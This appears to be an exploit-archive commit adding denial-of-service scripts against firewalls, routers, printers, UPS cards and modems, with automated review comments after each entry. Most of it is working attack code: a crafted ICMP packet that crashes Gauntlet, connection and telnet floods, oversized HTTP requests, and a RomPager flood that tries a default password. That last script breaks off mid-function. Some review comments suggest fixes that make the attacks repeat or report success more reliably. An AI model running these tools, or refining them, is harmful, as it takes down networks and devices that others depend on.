There is a vulnerability in Gauntlet Firewall 5.0 which allows an attacker to remotely cause a denial of service. The vulnerability occurs because Gauntlet Firewall cannot handle a condition where an ICMP Protocol Problem packet's (ICMP_PARAMPROB) encapsulated IP packet has a random protocol field and certain IP options set. When this specially constructed packet ( [ICMP PARAMPROB][IP with random protocol code and some ip options] ) is sent THROUGH the Gauntlet Firewall (not to the firewall itself), the firewall will hang, looking for the packet in it's transparency tables.
The packet structure looks like this:
Begin Packet
------------------------------------------
[NORMAL IP HEADER]
[ICMP PARAMPROB HEADER]
-- encapsulated ip packet --
[IP HEADER]
(important fields in ip header)
ip_p = 98 (let's specify a protocol that doesn't exist)
ip_hl = 0xf (stuff options)
------------------------------------------
End Packet
An attacker would do the following:
Construct the [ip-icmp-ip] packet using a raw socket (SOCK_RAW) with the fields set accordingly, destination set to any machine behind the firewall.
Send the packet(s).
The number of packets that need to be sent depends on the platform (ie Sol on a Sparc vs BSDI).
The consequence of this vulnerability being exploited is the target Gauntlet 5.0 firewall being remotely locked up. It should be expected that an attacker would send packets with spoofed source addresses in the ip header making it difficult to trace.
/*
* Discovered and written by: <godot@msg.net> <- Send money to :-)
* aka Mike Frantzen <frantzen@expert.cc.purdue.edu> <- Reply to
*
* Network Associates: "Who's watching your network?"
* MSG.net "Who's watching the watchers?"
*
* This can be found online at http://www.msg.net/firewalls/tis/bland.c
*
* Description:
* If you know an IP that will be routed through a Gauntlet 5.0 Firewall,
* you can remotely lock up the firewall (tested against Solaris 2.6 and
* BSDI). It locks up to the point that one packet will disable STOP-A
* (L1-A) on Sparcs and ~3-5 packets will disable Ctrl-Alt-Del on BSDI
* (Ctrl-Alt-Del still prompts Y/N but it never reboots).
*
* **You can NOT send this to the Gauntlet's IP. The packet must be one
* **that would go through the forwarding code.
*
* If you are on local ether to the firewall, set it as your default route
* or otherwise send the packet to the firewall's MAC.
*
* The packet is parsed before the packet filtering rules in Gauntlet. So
* the only known work-around is to ACL out ICMP type 12 at your screening
* router.
* Or you could switch to Gauntlet 5.5 which (in the beta) does not seem to
* be vulnerable -- but 5.5 introduces some new 'issues'.
*
*
* Technical Description of the packet:
* The packet is an ICMP Paramater Problem packet that encapsulates an IP
* packet with IP Options. There is a random protocol in the encapsulated
* IP packet. The trick is: the inner packet MUST have IP Options. Some
* options work, some don't.
* The firewall apparently is looking for the packet (or an entry in its
* transparency table) that matches the encapsulated packet. It just keeps
* looking.... It likely has interrupts masked off on Solaris.
*
*
* You need libnet to link this against. It's a pretty spiffy lib.
* http://www.infonexus.com/~daemon9/Projects/Libnet
* http://www.packetfactory.net/libnet
*
*
* For da script kiddies:
* Compile with 'gcc -o bland bland.c -lnet'
* ./bland -d <ip through the firewall>
* (Did you remember to install Libnet???)
*
*
* If it doesn't compile on your machine: I DON'T CARE!!! This program was
* a quick and dirty hack. You try reading a hexdump of a packet off the
* wire and writing something that can reproduce it.
* I know it compiles and works from FreeBSD 3.1
*
*
* Network Associates (TIS) was notified two weeks ago and they are working
* on a patch.
*
*
* Plugs:
* ISIC -- Program I used (and wrote) to find bugs in Gauntlet's IP stack.
* http://expert.cc.purdue.edu/~frantzen/isic-0.02.tar.gz
* Libnet -- Was able to write the basic exploit in 20 minutes because of
* libnet. See libnet link above. Thanks go out to Route!
*
*
* Credits:
* Mike Frantzen <frantzen@expert.cc.purdue.edu> Hey, thats me!
* Mike Scher <strange@cultural.com>
* Kevin Kadow <kadokev@msg.net> <- Gauntlet Random Seed Hole
* Lenard Lynch <llynch@tribune.com>
* Viki Navratilova <vn@msg.net>
*/
#include <libnet.h>
int main(int argc, char **argv)
{
u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip = 0;
u_long *problem = NULL;
u_char *packet = NULL;
int sock, c, len = 0;
long acx, count = 1;
struct icmp *icmp;
struct ip *ip;
/* It appears that most IP options of length >0 will work
* Works with 128, 64, 32, 16... And the normal ones 137...
* Does not work with 0, 1 */
u_char data[] = {137};
int data_len = sizeof(data);
printf("Written by Mike Frantzen... <godot@msg.net>\n");
printf("For test purposes only... yada yada yada...\n");
src_ip = inet_addr("10.10.10.10");
while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) {
switch(c) {
case 'd': dst_ip = libnet_name_resolve(optarg, 1);
break;
case 's': src_ip = libnet_name_resolve(optarg, 1);
break;
case 'D': ins_dst_ip = name_resolve(optarg, 1);
break;
case 'S': ins_src_ip = name_resolve(optarg, 1);
break;
case 'l': data_len = atoi(optarg);
break;
case 'c': if ( (count = atol(optarg)) < 1)
count = 1;
break;
default: printf("Don't understand option.\n");
exit(-1);
}
}
if ( dst_ip == 0 ) {
printf("Usage: %s\t -d <destination IP>\t[-s <source IP>]\n",
rindex(argv[0], '/') == NULL ? argv[0]
: rindex(argv[0], '/') + 1);
printf("\t\t[-S <inner source IP>]\t[-D <inner dest IP>]\n");
printf("\t\t[-l <data length>]\t[-c <# to send>]\n");
exit(-1);
}
if ( ins_dst_ip == 0 )
ins_dst_ip = src_ip;
if ( ins_src_ip == 0 )
ins_src_ip = dst_ip;
if ( (packet = malloc(1500)) == NULL ) {
perror("malloc: ");
exit(-1);
}
if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) {
perror("socket: ");
exit(-1);
}
/* 8 is the length of the ICMP header with the problem field */
len = 8 + IP_H + data_len;
bzero(packet + IP_H, len);
libnet_build_ip(len, /* Size of the payload */
0xc2, /* IP tos */
30241, /* IP ID */
0, /* Frag Offset & Flags */
64, /* TTL */
IPPROTO_ICMP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload */
0,
packet); /* Packet memory */
/* ICMP Header for Parameter Problem
* --------------+---------------+---------------+---------------
*| Type (12) | Code (0) | Checksum |
* --------------+---------------+---------------+---------------
*| Pointer | unused |
* --------------+---------------+---------------+---------------
* Internet Header + 64 bits of original datagram data....
*/
icmp = (struct icmp *) (packet + IP_H);
problem = (u_long *) (packet + IP_H + 4); /* 4 = ICMP header */
icmp->icmp_type = ICMP_PARAMPROB;
icmp->icmp_code = 0; /* Indicates a problem pointer */
*problem = htonl(0x14000000); /* Problem is 20 bytes into it */
/* Need to embed an IP packet within the ICMP */
ip = (struct ip *) (packet + IP_H + 8); /* 8 = icmp header */
ip->ip_v = 0x4; /* IPV4 */
ip->ip_hl = 0xf; /* Some IP Options */
ip->ip_tos = 0xa3; /* Whatever */
ip->ip_len = htons(data_len); /* Length of packet */
ip->ip_id = 30241; /* Whatever */
ip->ip_off = 0; /* No frag's */
ip->ip_ttl = 32; /* Whatever */
ip->ip_p = 98; /* Random protocol */
ip->ip_sum = 0; /* Will calc later */
ip->ip_src.s_addr = ins_src_ip;
ip->ip_dst.s_addr = ins_dst_ip;
/* Move our data block into the packet */
bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len);
/* I hate checksuming. Spent a day trying to get it to work in
* perl... That sucked... Tequilla would have helped immensly.
*/
libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_len);
/* Bah... See above comment.... */
libnet_do_checksum(packet, IPPROTO_ICMP, len);
printf("Sending %li packets", count);
for (acx = 0; acx < count; acx++) {
if( libnet_write_ip(sock, packet, len + IP_H) < (len + IP_H))
perror("write_ip: ");
else printf(".");
}
printf("\n\n");
return( 0 );
}
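Review bot: data_len is taken from the -l option with no upper bound, yet packet is a fixed 1500-byte malloc and data is a one-byte array, so any -l larger than 1 makes bcopy(data, ..., data_len) read past data and a large value writes past packet; the tool is memory-unsafe on its own command line and should clamp data_len to sizeof(data) or size the buffers from it. On the defensive side, the author's own text is the useful part and should be carried into the index: the packet is parsed before the filtering rules, the only known workaround is to drop ICMP type 12 (Parameter Problem) at the screening router, and the 5.5 beta was reported unaffected. The detection characteristic is an ICMP type 12 packet whose embedded IP header has ip_hl set to 15 with options present and an unassigned protocol number (98).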


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/665/info
A vulnerability in the Diva LAN ISDN Modem allows remote malicious users to lock up the modem requiring a hard reset.
The vulnerability manifests itself when a remote users connects to the Diva HTTP port and sends a GET request of the form 'login.html?password=<very long string>'.
Enter the URL 'http://diva/login.htm?password=0123456789012345678901234567890123456789' into your browser, where 'diva' is the IP address of the modem.
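Review bot: the file header for this hunk was lost in the rendered view, so the entry's path (and therefore its platform and type) cannot be confirmed from this page, and the two lines disagree on the resource name: the description says 'login.html?password=' while the instruction uses 'login.htm?password='. One of them is a typo and the entry should say which, since a defender matching the request path needs the right one; the useful fact for them is that a 40-character password value is already enough per the example, so a length limit on that parameter is the mitigation.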

platforms/hardware/dos/19919.c (executable file, 237 lines added)

@ -0,0 +1,237 @@
source: http://www.securityfocus.com/bid/1211/info
Opening approximately 98 connections on port 23 will cause Cisco 760 Series Routers to self reboot. Continuously repeating this action will result in a denial of service attack.
/* Cisco 760 Series Connection Overflow
*
*
* Written by: Tiz.Telesup
* Affected Systems: Routers Cisco 760 Series, I havn't tested anymore
* Tested on: FreeBSD 4.0 and Linux RedHat 6.0
*/
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec);
void net_write (int fd, const char *str, ...);
unsigned long int net_resolve (char *host);
void
usage (void)
{
printf ("usage: ./cisco host times\n");
exit (EXIT_FAILURE);
}
int
main (int argc, char *argv[])
{
char host[256];
int port,times,count,sd = 0;
int m = 0;
struct sockaddr_in cs;
printf ("Cisco 760 series Connection Overflow.\n");
printf ("-------------------------------------\n");
if (argc < 3)
usage();
strcpy (host, argv[1]);
times=atoi (argv[2]);
if ((times < 1) || (times > 10000)) /*Maximum number of connections*/
usage();
port =23; /* This might be changed to the telnet port of the router*/
printf ("Host: %s Times: %d\n", host, times);
for (count=0;count<times;count++){
printf ("Connecting... Connection number %d \n",count);
fflush (stdout);
sd = net_connect (&cs, host, port, NULL, 0, 30);
if (sd < 1) {
printf ("failed!\n");
exit (EXIT_FAILURE);
}
net_write (sd, "AAAA\n\n");
}
exit (EXIT_SUCCESS);
}
int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
if (!(cs->sin_addr.s_addr = net_resolve (server))) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i == -1) {
he = gethostbyname(host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
void
net_write (int fd, const char *str, ...)
{
char tmp[8192];
va_list vl;
int i;
va_start(vl, str);
memset(tmp, 0, sizeof(tmp));
i = vsnprintf(tmp, sizeof(tmp), str, vl);
va_end(vl);
send(fd, tmp, i, 0);
return;
}
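Review bot: `net_resolve` stores the `inet_addr` result in a `long` and tests `i == -1`, but `inet_addr` returns a 32-bit `in_addr_t`, so on LP64 builds a failed parse yields 4294967295, the `gethostbyname` fallback is never taken and a hostname argument is silently turned into 255.255.255.255; compare against `INADDR_NONE` in an `in_addr_t` instead. Two smaller points in the same file: `strcpy (host, argv[1])` copies an unchecked argument into a 256-byte buffer (check `strlen` or use `snprintf`), and `getsockopt` is given an `int len` where `socklen_t` is expected, which modern compilers flag. The header comment "I havn't tested anymore" should read "I haven't tested any others".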

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/1219/info
Large usernames or passwords sent to the router's HTTP interface restart the router. Router log will show "restart not in response to admin command"
Open the router interface with your browser.
Username: ......................... (x79 +)
After the router restarts, you can hit refresh on your browser to take it down again.
A simple script or program could be written to keep the router down indefinately.
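Review bot: the entry never identifies the affected vendor or model; "the router" and the BID link are all a reader gets, so the record is not searchable by product. Add the product name and firmware from the referenced advisory. The one concrete artifact here is the log message `"restart not in response to admin command"`, which is what an operator would look for when reviewing logs after unexplained restarts; it deserves to be called out as the indicator rather than left mid-sentence. Minor: "indefinately" should be "indefinitely".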

@ -0,0 +1,6 @@
source: http://www.securityfocus.com/bid/1491/info
HP JetDirect firmware is vulnerable to a Denial of Service attack. JetDirect devices have an FTP service which fails to properly handle bad FTP commands sent with the ftp "quote" command. This causes the device to stop responding and possibly display an error message. Powering the device off and on is required to regain normal functionality.
ftp <printer address>
quote AAAAAAAAAAA
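Review bot: the description says the device mishandles "bad FTP commands" sent via `quote`, but the entry states no affected JetDirect firmware versions and gives no fix or workaround beyond power-cycling; add the affected versions from the referenced advisory and note the defensive measure (disabling the print server's FTP service, or filtering TCP/21 to it) so the record is useful to administrators and not only as a reproduction.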

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/1838/info
Cisco devices running IOS software may be prone to a denial of service attack if a URL containing a question mark followed by a slash (?/) is requested. The device will enter an infinite loop when supplied with a URL containing a "?/" and an enable password. Subsequently, the router will crash in two minutes after the watchdog timer has expired and will then reload. In certain cases, the device will not reload and a restart would be required in order to regain normal functionality.
This vulnerability is restricted to devices that do not have the enable password set or if the password is known or can be easily predicted. The vulnerable service is only on by default in the Cisco 1003, 1004 and 1005 routers.
Users can identify vulnerable or invulnerable devices running IOS by logging onto the device and issuing the ?show version? command. If IOS is running on a vulnerable device the command will return ?Internetwork Operating System Software? or ?IOS (tm)? with a version number.
Vulnerable IOS software may be found on the following Cisco devices:
*Cisco routers in the AGS/MGS/CGS/AGS+, IGS, RSM, 800, ubr900, 1000, 1400, 1500, 1600, 1700, 2500, 2600, 3000, 3600, 3800, 4000, 4500, 4700, AS5200, AS5300, AS5800, 6400, 7000, 7200, ubr7200, 7500, and 12000 series.
*Recent versions of LS1010 ATM switch.
*Catalyst 6000 with IOS.
*Catalyst 2900XL LAN switch with IOS.
*Cisco DistributedDirector.
http://target/anytext?/
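Review bot: the quoted command and strings in the third paragraph were mangled on import: `?show version?`, `?Internetwork Operating System Software?` and `?IOS (tm)?` have had their typographic quotes replaced by question marks, which is actively misleading in an entry whose subject is a `?/` sequence in URLs; restore plain ASCII quotes. The first two paragraphs also need reconciling: the first says the loop is triggered by the URL "and an enable password", the second says the issue is restricted to devices with no enable password set or a guessable one; state clearly whether the crash occurs before or after authentication, since that decides whether the mitigation is "set a strong enable password" or "disable the HTTP server".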

platforms/hardware/dos/20332.pl Executable file, 64 lines
@ -0,0 +1,64 @@
source: http://www.securityfocus.com/bid/1855/info
A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack.
Note that 3Com is reportedly also vulnerable, but it is not verified which versions of IOS are exploitable.
#!/usr/bin/perl
#
# Ascend Kill II - perl version
# (C) 1998 Rootshell - http://www.rootshell.com/ - <info@rootshell.com>
#
# Released: 3/17/98
#
# Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues
# (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
#
# NOTE: This program is NOT to be used for malicous purposes. This is
# intenteded for educational purposes only. By using this program
# you agree to use this for lawfull purposes ONLY.
#
#
use Socket;
require "getopts.pl";
sub AF_INET {2;}
sub SOCK_DGRAM {2;}
sub ascend_kill {
$remotehost = shift(@_);
chop($hostname = `hostname`);
$port = 9;
$SIG{'INT'} = 'dokill';
$sockaddr = 'S n a4 x8';
($pname, $aliases, $proto) = getprotobyname('tcp');
($pname, $aliases, $port) = getservbyname($port, 'tcp')
unless $port =~ /^\d+$/;
($pname, $aliases, $ptype, $len, $thisaddr) =
gethostbyname($hostname);
$this = pack($sockaddr, AF_INET, 0, $thisaddr);
($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost);
$that = pack($sockaddr, AF_INET, $port, $thataddr);
socket(S, &AF_INET, &SOCK_DGRAM, 0);
$msg = pack("c64",
0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
0x50, 0x41, 0x53, 0x53);
for ($i=0; $i<500; $i++) {
$msg .= pack("c1", 0xff);
}
send(S,$msg,0,$that) || die "send:$!";
}
if ($ARGV[0] eq '') {
print "usage: akill2.pl <remote_host>\n";
exit;
}
&ascend_kill($ARGV[0]);
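Review bot: the description says an "invalid TCP packet (of zero length)" is sent to the administration port, but the script opens a `SOCK_DGRAM` socket and sends a 564-byte UDP datagram to port 9 (discard), which matches the comment in the C version being removed further down in this commit ("a specially constructed UDP packet on the discard port (9)"); the prose should say UDP/9 so that filtering advice targets the right protocol. In the code: `pack("c64", ...)` uses the signed `c` template for bytes such as 0xff (use `C`), `require "getopts.pl"` is unused and is no longer shipped in core Perl, `$SIG{'INT'} = 'dokill'` names a handler that is never defined, and the `sub AF_INET`/`sub SOCK_DGRAM` definitions shadow the constants already exported by `Socket`. The "3Com ... versions of IOS" sentence also looks like a copy error, since IOS is Cisco's operating system.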

platforms/hardware/dos/20654.pl Executable file, 49 lines
@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/2430/info
Symmetra is an Uninterruptable Power Supply manufactured by American Power Conversation Corporation (APC). Symmetra supports network options that allow a remote administrator to access the system via telnet, and gather information from the power supply via SNMP.
A problem with the network software used with the Symmetra can allow a denial of service to the system, thus preventing administrative access. This problem is due to the handling of the telnet protocol by the firmware of the power supply. The system does not support more than one telnet session at a time, and when it encounters three failed login attempts, discontinues access for a configurable period between 1 and 10 minutes.
Therefore, it is possible for a malicious user to launch an remote attack against the telnet service of the power supply, and prevent administrative access to the power supply for the duration of the attack. This vulnerability may affect other APC UPS products as well.
#!/usr/bin/perl
#altomo@nudehackers.com
#apc management card dos
$user = "blacksun";
$time = "$ARGV[1]";
use IO::Socket;
$ip = "$ARGV[0]";
$port = "23";
if ($#ARGV<0) {
print " useage: $0 <hostname> <delay in seconds>\n";
exit();
}
$socket = IO::Socket::INET->new(
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>$port,);
print "Apc management card DoS\n";
print "altomo\@nudehackers.com\n";
sub dos() {
print "DoS started will attack every $time seconds\n";
print "Ctrl+C to exit\n";
print $socket "$user\r";
print $socket "$user\r";
print $socket "$user\r";
print $socket "$user\r";
print $socket "$user\r";
print $socket "$user\r";
print "\n";
close $socket;
sleep($time);
&dos;
}
&dos;
#hong kong danger duo
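Review bot: `dos` is written as unbounded recursion (`&dos;` at the end of its own body) instead of a loop, so the Perl call stack grows on every pass; and the single `$socket` created at the top is closed on the first pass and never reopened, so every later pass writes to a closed handle and does nothing, which contradicts the "will attack every $time seconds" message. Create the `IO::Socket::INET` inside a `while` loop, or drop the recursion. Also `$#ARGV<0` only checks that a hostname was given, so a missing delay leaves `$time` empty and `sleep($time)` returns immediately; and "useage" in the usage string should be "usage".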

platforms/hardware/dos/20734.sh Executable file, 14 lines
@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/2551/info
PIX is an enterprise firewall engineered and maintained by Cisco Systems. It is designed to provide robust features and multiple methods of access control and filtering.
A problem with the PIX could allow a denial of service. PIX firewalls using TACACS+ are vulnerable to a resource starvation attack which results in a denial of service. Upon receiving multiple requests for TACACS+ authentication from an unauthorized user, the firewalls resources can be exhausted. This causes the firewall to crash, requiring power cycling to resume regular service.
This makes it possible for a user from either the public or private side of the PIX to crash the firewall, and deny service to legitimate users.
All PIX Firewalls having configuration lines beginning with the following line are affected:
pixfirewall# aaa authentication
Any configurations not including aaa authentication are not affected.
while (true); do (wget http://external.system 2>/dev/null &); done
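Review bot: `pixfirewall# aaa authentication` is shown with a CLI prompt but is described as a configuration line; drop the prompt so it reads as config text, and say which `aaa authentication` forms (the TACACS+ ones named in the prose) are in scope. The one-liner is a problem in itself: `http://external.system` is an unexplained placeholder, and a `while (true)` that backgrounds a `wget` on every iteration with no delay or bound simply forks processes until the host running it hits its process limit. From the operator's side the useful detection point in the text is the burst of TACACS+ authentication requests from a single unauthenticated source, which is what to watch for on the AAA server.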

platforms/hardware/dos/27775.py Executable file, 95 lines
@ -0,0 +1,95 @@
#!/usr/bin/python
################################################################
# #
# Netgear ProSafe - CVE-2013-4776 PoC #
# written by Juan J. Guelfo @ Encripto AS #
# post@encripto.no #
# #
# Copyright 2013 Encripto AS. All rights reserved. #
# #
# This software is licensed under the FreeBSD license. #
# http://www.encripto.no/tools/license.php #
# #
################################################################
import sys, getopt, urllib2
from subprocess import *
__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"
# Prints title and other header info
def header():
print ""
print " ================================================================= "
print "| Netgear ProSafe - CVE-2013-4776 PoC \t\t\t\t |".format(__version__)
print "| by {0}\t\t |".format(__author__)
print " ================================================================= "
print ""
# Prints help
def help():
header()
print """
Usage: python CVE-2013-4776.py [mandatory options]
Mandatory options:
-t target ...Target IP address
-p port ...Port where the HTTP admin interface is listening on
Example:
python CVE-2013-4776.py -t 192.168.0.1 -p 80
"""
sys.exit(0)
if __name__ == '__main__':
#Parse options
try:
options, args = getopt.getopt(sys.argv[1:], "t:p:", ["target=", "port="])
except getopt.GetoptError, err:
header()
print "\n[-] Error: {0}.\n".format(str(err))
sys.exit(1)
if not options:
help()
target = None
port = None
for opt, arg in options:
if opt in ("-t"):
target = arg
if opt in ("-p"):
port = arg
#Option input validation
if not target or not port:
help()
print "[-] Error: Incorrect syntax.\n"
sys.exit(1)
header()
headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" }
try:
# Get the startup config via HTTP admin interface
print "[+] Triggering DoS condition..."
r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers)
urllib2.urlopen(r,"",5).read()
except urllib2.URLError:
print "[-] Error: The connection could not be established.\n"
except:
print "[+] The switch should be freaking out..."
print "[+] Reboot the switch (unplug the power cord) to get it back to normal...\n"
sys.exit(0)
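Review bot: the bare `except:` after the `urllib2.URLError` handler turns every other exception, including a read `socket.timeout`, `KeyboardInterrupt` and `SystemExit`, into "[+] The switch should be freaking out...", so the script reports success whenever anything unexpected happens; catch `socket.timeout` explicitly and let the rest propagate. Two smaller points: `urllib2.urlopen(r, "", 5)` passes an empty string as `data`, which is not `None` and therefore turns the request into a POST, so the comment "Get the startup config via HTTP admin interface" and the method actually sent disagree; and the banner line `.format(__version__)` has no `{}` placeholder, so the version is never printed. `from subprocess import *` is unused.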

platforms/hardware/dos/30688.py Executable file, 33 lines
@ -0,0 +1,33 @@
# Exploit Title: Motorola SBG6580 Cable Modem & Wireless-N Router Denial of Service
# Date: 01/03/14
# Exploit Author: nicx0
# Vendor Homepage: http://www.motorola.com/
# Software Link: http://www.motorola.com/us/SBG6580-SURFboard%C2%AE-eXtreme-Wireless-Cable-Modem/70902.html
# Version: SBG6580-6.5.0.0-GA-00-226-NOSH
# POSTing a bad login page parameter causes the router to reboot.
import sys
import socket
import urllib2
import urllib
router_ip = ''
try:
router_ip = str(sys.argv[1])
except:
print 'motobug.py ip_address : e.g. motobug.py 192.168.0.1'
sys.exit(2)
query_args = {'this_was':'too_easy'}
url = 'http://' + router_ip + '/goform/login'
post_data = urllib.urlencode(query_args)
request = urllib2.Request(url, post_data)
try:
print '[+] Sending invalid POST request to ' + url + '...'
response = urllib2.urlopen(request,timeout=5)
except socket.timeout:
print '[+] Success! No response from the modem.'
except urllib2.HTTPError:
print '[-] Failed: HTTP error received. The modem might not be a SBG6580.'
except urllib2.URLError:
print '[-] Failed: URL error received. Check the IP address again..'
else:
print '[-] Failed: HTTP response received. Modem does not appear to be vulnerable.'
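Review bot: the outcome is inferred from silence alone: `except socket.timeout` is the only "Success" branch, so a modem that is merely slow, dropping packets or busy is reported as rebooted after 5 seconds, while a device unreachable at connect time surfaces as `urllib2.URLError` (urllib2 wraps connect-phase socket errors) and is reported as "Check the IP address". Confirm the reboot independently before printing success, for instance by polling the interface again after a pause, and add a comment that `import socket` is there only for the timeout class.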

platforms/hardware/dos/33737.py Executable file, 363 lines
@ -0,0 +1,363 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: ZTE and TP-Link RomPager DoS Exploit
# Date: 10-05-2014
# Server Version: RomPager/4.07 UPnP/1.0
# Tested Routers: ZTE ZXV10 W300
# TP-Link TD-W8901G
# TP-Link TD-W8101G
# TP-Link TD-8840G
# Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0
# Tested on: Kali Linux x86
#
# Notes: Please note this exploit may contain errors, and
# is provided "as it is". There is no guarantee
# that it will work on your target router(s), as
# the code may have to be adapted.
# This is to avoid script kiddie abuse as well.
#
# Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
# Author takes no responsibility for any kind of damage you cause.
#
# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
#
# Original write-up: https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
# Video: https://www.youtube.com/watch?v=1fSECo2ewoo
# Dedicate to Nick Knight and Hood3dRob1n
#
# ./dos.py -i 192.168.1.1
import os
import re
import sys
import time
import urllib
import base64
import httplib
import urllib2
import requests
import optparse
import telnetlib
import subprocess
import collections
import unicodedata
class BitReader:
def __init__(self, bytes):
self._bits = collections.deque()
for byte in bytes:
byte = ord(byte)
for n in xrange(8):
self._bits.append(bool((byte >> (7-n)) & 1))
def getBit(self):
return self._bits.popleft()
def getBits(self, num):
res = 0
for i in xrange(num):
res += self.getBit() << num-1-i
return res
def getByte(self):
return self.getBits(8)
def __len__(self):
return len(self._bits)
class RingList:
def __init__(self, length):
self.__data__ = collections.deque()
self.__full__ = False
self.__max__ = length
def append(self, x):
if self.__full__:
self.__data__.popleft()
self.__data__.append(x)
if self.size() == self.__max__:
self.__full__ = True
def get(self):
return self.__data__
def size(self):
return len(self.__data__)
def maxsize(self):
return self.__max__
def __getitem__(self, n):
if n >= self.size():
return None
return self.__data__[n]
def filter_non_printable(str):
return ''.join([c for c in str if ord(c) > 31 or ord(c) == 9])
def banner():
return '''
\t\t _/_/_/ _/_/_/
\t\t _/ _/ _/_/ _/
\t\t _/ _/ _/ _/ _/_/
\t\t _/ _/ _/ _/ _/
\t\t_/_/_/ _/_/ _/_/_/
'''
def dos(host, password):
while (1):
url = 'http://' +host+ '/Forms/tools_test_1'
parameters = {
'Test_PVC' : 'PVC0',
'PingIPAddr' : '\101'*2000,
'pingflag' : '1',
'trace_open_flag' : '0',
'InfoDisplay' : '+-+Info+-%0D%0A'
}
params = urllib.urlencode(parameters)
req = urllib2.Request(url, params)
base64string = base64.encodestring('%s:%s' % ('admin', password)).replace('\n', '')
req.add_header("Authorization", "Basic %s" %base64string)
req.add_header("Content-type", "application/x-www-form-urlencoded")
req.add_header("Referer", "http://" +host+ "/maintenance/tools_test.htm")
try:
print '[~] Sending Payload'
response = urllib2.urlopen(req, timeout=1)
sys.exit(0)
except:
flag = checkHost(host)
if flag == 0:
print '[+] The host is still up and running'
else:
print '[~] Success! The host is down'
sys.exit(0)
break
def checkHost(host):
if sys.platform == 'win32':
c = "ping -n 2 " + host
else:
c = "ping -c 2 " + host
try:
x = subprocess.check_call(c, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
time.sleep(1)
return x
except:
pass
def checkServer(host):
connexion = httplib.HTTPConnection(host)
connexion.request("GET", "/status.html")
response = connexion.getresponse()
server = response.getheader("server")
connexion.close()
time.sleep(2)
if server == 'RomPager/4.07 UPnP/1.0':
return 0
else:
return 1
def checkPassword(host):
print '[+] Checking for default password'
defaultpass = 'admin'
tn = telnetlib.Telnet(host, 23, 4)
tn.read_until("Password: ")
tn.write(defaultpass + '\n')
time.sleep(2)
banner = tn.read_eager()
banner = regex(len(defaultpass)*r'.'+'\w+' , banner)
tn.write("exit\n")
tn.close()
